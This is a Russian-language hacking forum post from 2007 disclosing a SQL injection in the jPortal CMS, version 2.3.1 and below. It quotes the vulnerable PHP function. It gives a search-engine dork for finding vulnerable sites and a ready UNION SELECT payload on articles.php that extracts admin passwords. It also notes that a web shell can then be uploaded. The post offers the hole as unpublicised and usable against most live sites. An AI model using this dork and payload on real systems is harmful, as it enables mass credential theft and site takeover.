JPoprtal 2.3.1 и ниже SQL иньекция.

JPoprtal 2.3.1 и ниже SQL иньекция.

09.11.2007, 15:43

Alexsize

Fail

Регистрация: 17.09.2005

Сообщений: 2,242

С нами: 10866626

Репутация: 4268

JPoprtal 2.3.1 и ниже SQL иньекция.

Популярная в Польше CMS.
Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена.
Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим.

Уязвимый код:

PHP код:


		
			
function topic_name($a) 

{    

global $topic_tbl;

$query = "SELECT * FROM $topic_tbl WHERE id=$a";

$result = mysql_query($query);  

$r = mysql_fetch_array($result);    

return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';  

}

Дорк:intext:"jPORTAL 2" & inurl:"articles.php?topic="

Код:

articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/

В более старых версиях jp_admins. Также есть таблица users или jp_users.

Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код.

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________
...

Последний раз редактировалось Alexsize; 09.11.2007 в 15:50..